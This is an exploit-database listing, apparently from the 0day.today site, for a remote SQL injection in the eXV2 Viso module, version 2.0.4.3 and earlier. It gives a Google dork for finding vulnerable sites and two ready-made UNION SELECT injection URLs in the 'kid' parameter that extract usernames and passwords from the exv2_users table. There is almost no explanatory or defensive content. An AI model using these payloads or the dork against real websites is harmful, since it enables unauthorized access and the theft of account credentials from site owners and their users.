[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

eXV2 Module Viso <= 2.0.4.3 (kid) Remote SQL Injection Vulnerability

Author
S@BUN
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-2740
Category
web applications
Date add
14-03-2008
Platform
unsorted
====================================================================
eXV2 Module Viso <= 2.0.4.3 (kid) Remote SQL Injection Vulnerability
====================================================================



##########################################
#
# Powered by eXV2 Viso 2.03 SQL Injection
#
###########################################
#
# DORKS 1 : allinurl :"modules/viso"
#
###########################################
EXPLOIT 1 :

modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass/**/from/**/exv2_users/*where%20exv2_admin%201

EXPLOIT 2 :

modules/viso/index.php?kid=-9999999/**/union/**/select/**/0,0x3a,uname,0x3a,0x3a,0x3a,pass,pass/**/from/**/exv2_users/*where%20exv2_admin%201

###########################################
Viso 2.03
Submit date: 2006/8/10
Homepage: www.exv2.de
Version : 2.03



#  0day.today [2024-12-23]  #